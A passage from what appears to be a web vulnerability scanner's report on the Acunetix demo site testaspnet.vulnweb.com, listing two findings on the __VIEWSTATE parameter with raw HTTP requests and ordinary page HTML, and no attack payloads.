RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8563&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCAJffXatsIZGRk8y%2BbE%2Fcd5P3mD92nhNwRONE1Tk8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKopq%2BJDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMQhoxKjfzLIJY%2Bk55KKPs88pjvtA%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:37:10 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCAJffXatsIZGRk8y+bE/cd5P3mD92nhNwRONE1Tk8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKopq+JDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMQhoxKjfzLIJY+k55KKPs88pjvtA=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:White" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8551&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCAMPppYdsIZGRkguFE6AB%2BzPg1lk57Co5trhG9z1I%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLXrp2YAQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMlYJAbwoxRfK4UDQaUQi6loDVh2s%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:02:14 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgCAMPppYdsIZGRkguFE6AB+zPg1lk57Co5trhG9z1I=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLXrp2YAQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMlYJAbwoxRfK4UDQaUQi6loDVh2s=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:White" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a 